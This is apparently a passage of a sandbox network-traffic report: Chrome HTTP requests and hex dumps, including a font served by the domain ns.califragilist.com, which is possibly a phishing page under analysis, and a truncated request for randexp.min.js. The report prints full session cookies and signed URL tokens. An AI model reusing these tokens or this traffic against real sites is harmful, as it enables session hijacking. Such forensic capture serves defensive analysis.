                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: f8 38 3f bd ee b0 ad 34 7f fe fe a1 c6 53 ee bf ff bb a3 5f be 98 44 87 d1 39 8c c2 ff 5f ff ab bd e1 99 eb 7d 62 b1 48 28 0a 09 29 77 a6 55 70 c0 46 c3 ef 87 ba fe f8 99 9d db 78 1a 36 d6 74 7b 64 aa 20 1d b4 0b da 52 ff b3 d9 6a ef a5 a3 cf 1e 4f b4 02 97 09 94 f4 54 1f b3 7b 6d d4 8f 17 ee 2b cb 6b bb f3 ea e3 59 e2 05 ad 79 b9 68 05 49 62 56 99 cd 2c 54 d4 60 96 43 2f d0 0c 20 86 46 3c ac f7 3d 89 a7 0d b5 e3 56 65 b1 b7 00 cd 75 98 87 03 be 30 f6 77 7d 37 26 c2 a1 c8 bb 23 8d 05 33 c9 a9 ba fd 4a 4e 76 e7 e9 b5 cf eb 6f f8 f9 e4 e6 e6 fd f5 f5 c0 ec 74 98 9c c3 35 07 f7 49 c9 89 8f d4 79 6c 76 39 5d c9 d6 fa d1 f5 6f e3 a4 8f ba fa 68 bb 04 c7 6f 9f 6f e0 cb 5a ad cb 42 da 21 bc 85 a7 e5 fb a7 9e ab 01 83 01 08 b4 a9 61 4b d6 79 06 66 0a 61 45 d4 1d
                                                                                                                                              Data Ascii: 8?4S_D9_}bH()wUpFx6t{d RjOT{m+kYyhIbV,T`C/ F<=Veu0w}7&#3JNvot5Iylv9]ohooZB!aKyfaE
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: 26 42 67 0a 38 40 82 a1 65 99 d1 14 0a 63 bb 02 65 03 1e b3 c1 4a 4a 70 14 81 51 bf 67 c4 ef 2d e0 ae 3c b5 8f a9 a0 84 eb 9c 47 12 a6 10 45 87 23 73 0e b0 da 1e 15 0a fc c1 0e 13 a5 50 38 85 2b 3c 7c e5 bc 63 2e ba ec a4 ab 6e 93 1b ca 77 a9 b0 83 40 8e 5a fe f3 ce 37 c6 6d de 9f 7d d0 94 93 1c 3e 5e 7a f2 4c c5 39 f3 28 f5 dd e5 4a 1e bc b4 f4 ca 53 cb 9f 31 a5 e3 9e 77 42 fc 4b e4 12 ff 64 d3 65 37 bf ee 0a 29 21 1a 30 9f 2b 10 db 01 f2 b4 80 14 6f 25 7a 77 ff 40 e5 94 81 a9 41 35 1f 6c 34 47 ab 5d 80 de dd f8 70 fb 7f ad 3c 00 d4 01 16 a0 fc e6 7e 25 3f ba dc 73 f2 84 c3 1e d6 4f 02 c7 cd 8a 6e c5 bb 56 5d 88 d0 30 c3 ca d0 c7 d4 1b 4e ca de 5c d9 87 83 76 b6 9c ed 4a ee 9d 6e ef 39 d2 7f bd 9e 19 7a f9 ac d5 73 5d f9 a6 eb fb f3 7c 99 a5 ff c9 fc 7b
                                                                                                                                              Data Ascii: &Bg8@eceJJpQg-<GE#sP8+<|c.nw@Z7m}>^zL9(JS1wBKde7)!0+o%zw@A5l4G]p<~%?sOnV]0N\vJn9zs]|{
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: 01 87 fb 57 f8 02 a6 e7 7c ec d7 42 fb 31 97 76 f3 f4 f1 d4 d1 c9 2c 3b d9 cb 32 27 b8 e0 ba bb de f0 e9 81 c3 4d 9b c7 9d de 2b 5e aa 39 d5 f6 68 3c ca c3 b5 45 4b 26 69 35 3b 22 f8 66 00 cf 15 c3 bf a1 9f 94 ff a2 a5 42 76 c4 5f 6d a9 db 34 3d bc e8 cf ef d9 4c cd 9c 69 e9 df c1 83 ef 7e ef e7 76 36 b9 7b 7f f0 2f cd 9d dc 1c b8 ff 9c dd e9 ce e6 6c d0 89 3f 17 00 e0 55 3f 77 1e 45 08 4a c1 0e 70 80 2b 7f c4 29 43 1e 79 e5 4d ad 41 79 75 1d 85 fa 9d 91 63 fa 53 a2 5a 2d 3a 68 d9 31 27 9c 73 c2 05 97 28 dc 74 3b f0 57 d3 3d 8f cc d7 42 9d 78 06 d5 ef c4 6c 34 dd a5 c7 87 9e d3 f6 ba ba 2b 2f fb 50 c6 9f 4f 98 df 5d 9d 2d f5 75 bf 22 77 4e f1 c9 83 cd 87 da b7 65 1e 6e 3d b2 61 cf cb 40 de 7b f3 77 b6 3d 98 7f fa ec ba b7 35 14 5c 7e d1 4a b7 ee dc 51 78
                                                                                                                                              Data Ascii: W|B1v,;2'M+^9h<EK&i5;"fBv_m4=Li~v6{/l?U?wEJp+)CyMAyucSZ-:h1's(t;W=Bxl4+/PO]-u"wNen=a@{w=5\~JQx
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: 29 a5 b1 31 28 ad 8d 49 e9 6c 2c 4a 6f 63 53 06 1b 87 32 da b8 94 c9 c6 a3 cc 36 fe 1a 3f a6 73 3f a9 6a 37 c6 d4 41 be bc 63 57 27 50 e1 3c 5e f4 5b 33 e8 7c 78 d1 df 1b b4 85 35 b6 5c 36 da 4a 5b 68 1b cc e0 b1 1d 08 76 00 c1 4e 20 d8 05 04 bb 81 60 0f 10 ec 05 82 7d 40 c2 21 d4 d3 c3 46 a9 70 4c 65 af 6a 46 9e cc 86 31 c4 ca 93 6e fa 8b 26 02 61 27 3c 70 a2 48 2b 19 30 64 c3 7d 1b 0d 93 af 05 36 b8 d6 89 0d 6b 21 ee 12 1d 34 b6 ec 2c 72 14 83 c2 a5 c5 b5 62 52 15 4e a0 3b bc 1e 41 92 35 ba 24 b0 77 e8 84 21 2c 04 cd 2f 1c 7f f1 34 9f d8 fd 96 90 9d 9b 4e 0a f5 5a f1 fa 4b 09 50 c3 7d 27 4d 77 ae 77 32 cd 82 30 0e 9b ce 90 a5 31 92 e6 8a 3a ad 80 33 20 d6 bf 1c bf b8 56 f9 07 e5 4f 87 0a 0b d4 34 bd 2c b2 73 fa a6 93 03 68 60 d9 19 55 17 a4 8a 5b c7 e3
                                                                                                                                              Data Ascii: )1(Il,JocS26?s?j7AcW'P<^[3|x5\6J[hvN `}@!FpLejF1n&a'<pH+0d}6k!4,rbRN;A5$w!,/4NZKP}'Mww201:3 VO4,sh`U[
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: 81 cc 76 21 c7 06 d9 2a fd 90 78 fb 11 1e b0 6c 7b 16 1e f7 81 66 5f c9 86 78 07 ae e5 f3 a1 92 c8 76 3e f6 dd ea 77 6c b0 c9 ca 8f c0 a9 18 d9 95 b0 d2 74 0b f5 36 bb 67 96 9a 5e 08 c2 ec 5f 59 dd 1f 29 29 63 7f 76 09 e5 97 48 e8 5d f2 d6 98 90 17 6e f9 c3 53 16 8c aa 2b c1 2a 8d 58 31 50 cf fd 70 ff a0 1e a6 51 22 eb 5a 71 c5 62 86 2e 66 bd 65 dd 0b 36 b8 6d d8 71 f6 dc 7a e8 63 42 90 c8 3e a8 c9 f5 84 34 c7 20 4f 6c 24 ca fb 3c c0 f6 c8 18 df 9b 6b a7 c8 e5 b0 7d 19 a9 d8 05 3d 6e ae ac d9 c8 19 20 6f 5d 9a 62 23 46 a3 8c 62 6a f5 2e b3 82 87 30 d2 b4 99 c8 68 4c 11 a6 c2 ba 94 c3 07 d8 1a 0d 24 e8 a0 81 c5 15 54 3a 57 d4 fb fa 7e 00 4f 48 92 69 b3 ad b8 b4 11 3d 1a 48 73 6d 7c 60 1b 83 e0 34 91 58 ba be c5 00 21 83 60 01 fc 35 de bf 85 08 2c 98 0e 09
                                                                                                                                              Data Ascii: v!*xl{f_xv>wlt6g^_Y))cvH]nS+*X1PpQ"Zqb.fe6mqzcB>4 Ol$<k}=n o]b#Fbj.0hL$T:W~OHi=Hsm|`4X!`5,
                                                                                                                                              2024-11-06 15:56:00 UTC1369INData Raw: a7 06 d4 cd 83 c0 f2 ba bf 84 b5 69 1d 3c 31 46 2a 3b 9d b5 03 b9 b3 6d bd ab 4c c2 7c 42 09 c5 39 09 c8 ef 63 09 78 83 6f 48 a6 3b 90 83 18 25 79 72 47 76 61 ce 4c 5a 32 c0 de 11 19 13 b2 8b 01 14 50 48 67 17 c1 40 9f db d1 a2 30 99 cc 05 c2 9a d3 ff a9 3e ad 38 62 c6 8e bc ff 60 25 ac b5 5f 29 60 4d 64 62 88 b5 75 68 36 25 a7 c5 8e 03 24 9a 35 ce 03 45 e8 95 1f d1 53 2c 89 12 45 38 ef 68 4d c8 41 86 ad 65 02 ba 80 91 0a 3e b2 ef 49 f7 d3 6e 28 e2 5d dd 8f 29 2e 26 69 14 e7 02 2c 7b 38 8a 58 2e 78 32 56 f5 90 cb c2 fb 4c a6 c2 43 26 f9 51 57 dd 88 a8 44 c8 d2 8c 7f 2d 77 c2 40 5d 4d d6 a6 22 1b 0c 00 0d d9 8f b1 f1 3f f9 72 dc 15 1d c1 58 32 85 65 60 84 7f 39 42 c8 44 9f 9e c0 93 39 c5 0c 98 e5 21 14 ee 30 b0 dd 3e b7 b1 83 45 d3 14 1f 2b 44 4b da a0 1f
                                                                                                                                              Data Ascii: i<1F*;mL|B9cxoH;%yrGvaLZ2PHg@0>8b`%_)`Mdbuh6%$5ES,E8hMAe>In(]).&i,{8X.x2VLC&QWD-w@]M"?rX2e`9BD9!0>E+DK


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              64192.168.2.1849829188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1307OUTGET /GDSherpa-regular.woff HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC1114INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: font/woff
                                                                                                                                              Content-Length: 36696
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="GDSherpa-regular.woff"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 15:48:27 GMT
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bwBgwh8LRAOawFj7ukrhaQg8xPEgbFUUfUcrI8eeILjmHpKzYheqe3FXSn05dyU3YAxD53ETMI7YHalOxVMIflHi7wLkF%2BsE%2FYh%2FIoz1JIpKq9%2B6jdt1wVmT44Lx4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3423&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2278&delivery_rate=777032&cwnd=251&unsent_bytes=0&cid=aeef8ab8af976a10&ts=34&x=0"
                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455fce9e2c92-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1885&delivery_rate=1843411&cwnd=239&unsent_bytes=0&cid=2adfb207135ba661&ts=555&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC255INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                                                                                                              Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 21 00 00 00 24 10 9d 09 5a 68 6d 74 78 00 00 76 f4 00 00 03 88 00 00 07 78 3b 0f c0 f7 6c 6f 63 61 00 00 7a 7c 00 00 03 a8 00 00 03 be 14 10 ec 74 6d 61 78 70 00 00 7e 24 00 00 00 20 00 00 00 20 03 2d 0c fd 6e 61 6d 65 00 00 7e 44 00 00 02 ce 00 00 06 27 d5 12 90 1c 70 6f 73 74 00 00 81 14 00 00 06 94 00 00 0b fb 31 2b f3 2c 70 72 65 70 00 00 8d a4 00 00 00 81 00 00 00 8d 19 50 02 10 78 da e5 5c 09 7c 55 d5 99 ff 4e 72 f3 5e f2 c2 0b 09 89 90 80 44 44 d0 b8 54 1c eb 82 e0 82 56 ad 02 a2 43 b5 b6 a3 b5 55 c4 5f 7f 4e c7 99 fa 6b 7f 38 8e 6d a7 88 d8 aa 68 07 51 1c 36 71 90 d6 85 c5 82 02 23 10 a3 88 04 59 34 6c 91 7d 33 90 40 20 90 90 84 97 bc e4 9b ff f9 ee b9 f7 dd f7 f2 92 80 5a 5f d2 b9 df ef bc bb 9c 73 cf f9 ce b7 9f e5 3e 52 44 14 a0 e1 f4 0b 4a ba
                                                                                                                                              Data Ascii: !$Zhmtxvx;locaz|tmaxp~$ -name~D'post1+,prepPx\|UNr^DDTVCU_Nk8mhQ6q#Y4l}3@ Z_s>RDJ
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 65 c0 da a6 57 b2 ad dd a0 f9 93 68 7d 1c 6a 79 0a 6f 8f c7 79 02 7f 61 f3 0a f7 2f 21 6f 32 2c c1 54 b1 21 f9 c0 20 1f 18 64 81 66 b5 36 16 28 37 1b e7 39 c8 5f 80 77 17 02 93 55 38 0b fd 44 9b d3 41 23 9b 4b 4e 8b 3b 21 29 39 46 52 c0 25 3c 9b 80 3e 3e 8f f3 0b 90 b5 17 85 53 7e f5 12 f2 b4 46 db da 9c 81 96 33 d0 b2 e5 e1 56 1d 24 26 8c 16 a5 25 f4 10 bc a7 6e 68 ab 07 da ea 6e 68 6e a1 2d 9f e1 be 85 de e8 ba d2 51 57 2e ea f2 8b ee ce 84 cc cf 46 de 1c a9 2b 08 cc fd c0 ba 2b e4 69 19 6a 5d 07 df 51 02 6b 35 16 32 aa 6b 9a 80 5c 2d bf 5a 76 6d ed 0f 03 93 5a 23 bb 75 52 4b b1 c8 4d b6 60 b4 14 3d 9f 2b bc 18 ac 1e 03 c7 fe 9d 2e 57 8f e3 fc 1f 74 39 e4 6a ae 70 ea 52 78 a9 f9 e4 97 f2 b3 e4 77 ad fc 96 ca ef 1e 4a 85 c4 97 40 e2 43 82 51 a1 d0 70 1f
                                                                                                                                              Data Ascii: eWh}jyoya/!o2,T! df6(79_wU8DA#KN;!)9FR%<>>S~F3V$&%nhnhn-QW.F++ij]Qk52k\-ZvmZ#uRKM`=+.Wt9jpRxwJ@CQp
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 74 11 65 99 39 83 40 07 93 f6 70 eb 23 c4 8e 43 6f cf 1c 59 31 46 d2 c4 65 94 cb eb f9 4d 2a 40 e4 be db eb 6d f9 31 39 15 98 79 82 7e 89 8f 0b da b2 9f 5f 27 ff db 9d ef 70 a9 28 fb 11 64 06 04 76 a8 b5 b9 54 33 e7 91 30 ab 2f 73 2f eb 30 ae 58 de 5a fc ee b1 a1 ad f5 21 51 d8 fb 65 fc a1 e3 80 ac 56 4b a4 cb ea 83 3f fe db e6 48 49 b0 cc 04 64 16 29 4f 62 94 64 3e 2e 4f 92 64 f7 86 43 e1 e3 31 18 e7 98 14 4c 94 25 e4 fd 90 e9 7d ad da 8b 0e 69 47 da 8e 51 78 70 9c dc c1 9d 67 54 d2 d1 23 9a 28 1c 8e 74 ba 59 81 6c ea 94 07 7c cf 71 99 5b 0a ca 5a 47 19 97 48 b4 78 96 2d f7 88 ce 6a 61 fb 8f b7 36 b7 a4 2d 3b 6a b0 e7 2e eb bf 75 dc cb 90 d6 f3 01 2e 6a dd c3 0b ce 7a 95 a0 8e fe 1e 8e 60 87 90 99 43 36 bd 4d 6c 52 de a9 28 98 09 79 bd 9f a7 f0 28 8c 33
                                                                                                                                              Data Ascii: te9@p#CoY1FeM*@m19y~_'p(dvT30/s/0XZ!QeVK?HId)Obd>.OdC1L%}iGQxpgT#(tYl|q[ZGHx-ja6-;j.u.jz`C6MlR(y(3
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 16 db b6 4a 78 11 84 0e 65 f2 36 9c c7 a0 de 49 bc 02 5a be 52 7f 8f 11 59 e5 8a 83 f5 73 22 2d 9b 79 09 4a e9 3d e4 49 d0 ce ed d0 17 86 f4 5d 86 e7 13 51 67 39 ef 81 dd d1 91 c2 21 19 97 4c 14 3c 83 b2 93 5c cf 07 6a 6d 55 9a da 6e 8c 1c 10 5b bd 1f e7 4a ba 98 0f 00 a7 03 bc 53 ef e5 96 fe 55 e9 ef 90 74 2c 16 b1 73 28 43 bc 5c 52 0e a2 b7 90 de 55 2d de 37 b3 5d 99 59 04 2a eb bd fb 7d 80 f3 5f f8 15 d0 be 0c b6 ef 66 fe 33 ff 1a f5 2e 85 6d df cc 1b 51 63 09 6f 41 e9 47 f8 03 fe 5f 48 59 25 7f c2 af 23 bf 54 62 ae 63 ae 5e f7 80 c5 5d 01 3b 3b 1f ed 97 80 02 65 28 33 9f 27 b9 7a 5e 2a 5f 00 bc 8d d8 d4 d9 ef 12 e4 22 3c 99 86 34 01 bd fa 3d 24 e6 4f b2 0f 4c 53 41 7f 33 f0 5a 3b 1d 48 f5 f8 bd 1d a0 50 19 f5 76 65 56 4b 74 bd ec d0 af 6e 4b e3 23 da
                                                                                                                                              Data Ascii: Jxe6IZRYs"-yJ=I]Qg9!L<\jmUn[JSUt,s(C\RU-7]Y*}_f3.mQcoAG_HY%#Tbc^];;e(3'z^*_"<4=$OLSA3Z;HPveVKtnK#
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 6d 46 c6 81 33 dc 78 c9 c6 44 8f c0 b3 62 c6 1f 55 26 72 4a 97 19 4c 3b ae cd b7 63 4e d9 93 e3 37 36 5e be 64 10 1f e1 17 0e 63 54 8c a8 39 d9 fe a7 8c 53 99 8f 8c c2 fd b8 cc 98 66 88 b5 3b c2 d3 ed 15 e1 28 dc ff 68 66 4c 29 26 5a b5 a2 66 d3 ec af 31 7d 32 86 3b 2e fc c9 b5 69 29 b8 a7 bb b1 8a df ac fc 07 78 3b 38 79 50 d6 55 92 cd 5a 5b b0 8d af 95 e3 cb 4c b3 d0 2b 7a 7d 36 c9 23 d5 b1 f1 a3 ce 49 8b 6b 49 2c 67 75 cc 70 2a 23 4e 8c 15 2d 4b 9a 1f 01 a9 11 fd 16 1d ff 6a 87 9f 3a ef a1 3a 01 8e 49 f2 55 cd b9 b8 3a 1f d0 8f 2e 04 f4 a7 ef d0 cf f1 ec 61 5a 4d 0f d0 1a 5a 47 1f d1 67 54 42 2b 69 23 6d a3 62 da a1 d2 e9 73 15 54 d9 8a d4 19 ea 0e e5 57 bf 56 7f 50 df 53 cf a8 97 d5 dd ea 15 c0 83 6a 8a 9a a1 46 ab 99 6a 96 7a 58 cd 06 3c a2 e6 00 fe
                                                                                                                                              Data Ascii: mF3xDbU&rJL;cN76^dcT9Sf;(hfL)&Zf1}2;.i)x;8yPUZ[L+z}6#IkI,gup*#N-Kj::IU:.aZMZGgTB+i#mbsTWVPSjFjzX<
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: d3 8d 65 9c d4 38 81 89 8c 27 91 29 4c 65 1a 93 98 cc 74 66 90 ce 4c 66 31 9b 39 cc 65 1e 19 64 32 9f 2c 16 b0 90 1c b2 59 44 2e 8b 59 c2 52 f2 58 a6 5d ac 10 37 ab 58 47 be 98 f7 b2 9a 35 14 52 c0 7a 36 52 4c 11 1b 28 a1 94 4d f8 d8 cc 16 b6 52 46 39 db d9 c1 4e 76 b1 8d dd ec 61 2f fb d8 4f 05 07 a8 e4 20 87 38 cc 11 8e 72 8c e3 54 71 82 53 9c e6 0c e7 38 cf 59 2e 70 92 8b 5c e6 12 57 b8 4a 35 d7 b8 2e 86 6e 72 8b db dc e1 ae 34 71 9f 1a 1e 88 cb 70 1e 8a 5b b4 91 7a f1 f6 84 97 e2 ae 91 57 62 e7 35 6f c5 ce 7b 3e 88 9d 26 fd 92 a5 83 6f e2 e7 bb 89 20 c5 78 4c 2c 79 26 ce 64 eb 35 6d bb 8c 6a b5 81 ae 5a 4c 95 dd f8 5b bf 71 47 f1 77 36 5e d5 2e 9e de b2 4f ed d1 63 6a b4 fd 60 53 6d ed 23 53 fd 9f 4a db b2 ee 2b 1a a3 2c d7 3e 53 96 5b f1 6a 9b 32 f4
                                                                                                                                              Data Ascii: e8')LetfLf19ed2,YD.YRX]7XG5Rz6RL(MRF9Nva/O 8rTqS8Y.p\WJ5.nr4qp[zWb5o{>&o xL,y&d5mjZL[qGw6^.Ocj`Sm#SJ+,>S[j2
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: e7 f3 fd 6a 65 eb 3d ad d1 5a e5 68 9d de d7 7a e5 fe 9d 05 42 09 b3 6c ae c0 05 f6 f5 8a 54 a2 32 17 71 31 55 a8 4a 35 aa 53 83 4b a8 69 c9 5d 9b 08 2e b5 cc a9 6b 99 5e ff af fc b0 88 34 16 b3 84 b7 49 27 c3 f2 7c 19 ef 58 a6 67 b2 d2 f2 73 15 ef b2 da f2 fd 3d 4b d2 b5 96 18 eb 78 9f f5 e4 fe c1 9c e9 2f a1 a7 8b 91 33 84 04 23 23 60 54 04 8d 88 4f 8c 89 42 e3 e1 e7 52 22 2a 18 13 46 84 f1 e0 1a 11 0d 8c 06 9f 91 10 5d ca c2 1c 63 b3 84 db 4c fb b7 2b d9 6b b4 2e d0 5b ea 61 fc 6e 33 2a 9b 6a 9f 91 fb a1 76 29 dd e8 3d 68 7f ff b0 8e a8 c0 c8 5e 64 df de 60 4c cd 32 ee f7 2b 5f 4b b5 dd 4e 9f 44 23 7b ba ed 44 1b d7 43 4b fc ab 97 35 b9 b4 7f 25 9d dc a2 03 c6 dd 5c ed d6 db 76 5a 8d 26 9f 83 d6 d3 24 eb f0 48 ed b5 2c e8 6a 89 d0 dd 72 a0 8c ff be a5
                                                                                                                                              Data Ascii: je=ZhzBlT2q1UJ5SKi].k^4I'|Xgs=Kx/3##`TOBR"*F]cL+k.[an3*jv)=h^d`L2+_KND#{DCK5%\vZ&$H,jr
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 66 eb 76 b1 3c b4 11 ca 63 19 8d c5 5b ec 02 2a 5e 6a 6f a2 6c a0 04 c8 79 91 0c 7d c0 e6 8d de 66 df 02 ac 86 31 5a a2 15 30 d4 c5 51 43 b3 30 f5 ac 6d c0 78 7a b8 aa 18 0d d2 70 94 43 89 d8 60 f6 f7 87 d1 91 0e a4 c0 c8 c6 8a e6 f3 6b 0b 95 e7 5d 4e 6d 3f 3c 7c 31 6b d5 c3 ea 69 ab cf 2d f6 19 3e 7f fd 15 76 d7 c8 fa cd 3f 1a 2a 96 e4 84 ef a7 ed 84 11 a0 52 72 88 23 2a 17 86 17 21 11 f4 2f a1 11 c8 75 63 dc 34 3e 3e 3c d1 5c 6a 64 02 ed 85 10 b4 17 6d 64 5d 7f 6d fd 18 e7 fc 4c d0 0b 8f 01 f9 23 ef b3 71 d6 f7 46 2e e3 3f 0a 97 84 5e 28 d6 26 8b ec d7 f0 07 cf 04 5a fc 6d 6d c7 75 d0 24 2f 0c 6c f4 66 a1 58 c2 43 90 e8 8b 78 e3 c8 c7 fc d0 5d ed 69 31 9f 22 92 8e 4f e8 03 57 25 06 a2 50 29 a2 7d 00 04 d2 dc 3e 3e 6a 1f 51 82 81 28 d2 05 40 19 b0 f2 16
                                                                                                                                              Data Ascii: fv<c[*^joly}f1Z0QC0mxzpC`k]Nm?<|1ki->v?*Rr#*!/uc4>><\jdmd]mL#qF.?^(&Zmmu$/lfXCx]i1"OW%P)}>>jQ(@
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 31 72 41 70 bd 8e 2f 0b f3 d1 a3 b2 a5 86 2a 84 6b dc ed 91 bf b2 be a2 3d da 33 7a 5b b5 06 c6 6f 08 93 cc bc 68 71 55 23 30 3a 10 cc ff 92 90 10 c7 82 57 70 7c a3 0b 22 ea 92 4c ce fe 65 6e 2a 98 32 98 7a 57 9b a1 25 da 63 89 93 41 99 31 60 99 1b 52 a9 ec 72 59 4c b6 0c 8c 8b cb 98 01 87 6b 45 b3 43 a1 50 d6 ba 22 a5 d2 4b ca c7 88 e6 5a ad 25 20 2c 94 61 8c 31 a1 c9 61 c9 40 75 08 e1 86 c6 a8 77 07 86 e8 d2 15 0a bd bd aa d6 a6 8f 71 28 da 61 8a e3 3e 2b fb cb 63 17 bf 7e 60 f6 ec 07 be be f8 c8 df ca d8 fd d6 00 7c ce ba 18 df ba b3 77 d3 f5 d5 19 19 ab af 6f 92 14 f5 7f fa 0e 8e a9 ea 7d 7d ff 3a 26 44 1f 07 56 ee 98 30 dd c1 d0 a1 7e 99 e2 26 e3 cf 44 32 d1 4c 9e 25 c7 8f 07 bb 9d 76 33 f1 9b 9a 61 30 33 48 c1 34 a9 c0 6b 02 df 09 9c 13 62 ed 04 68
                                                                                                                                              Data Ascii: 1rAp/*k=3z[ohqU#0:Wp|"Len*2zW%cA1`RrYLkECP"KZ% ,a1a@uwq(a>+c~`|wo}}:&DV0~&D2L%v3a03H4kbh


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              65192.168.2.1849831185.199.110.1334432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1092OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                              Host: objects.githubusercontent.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
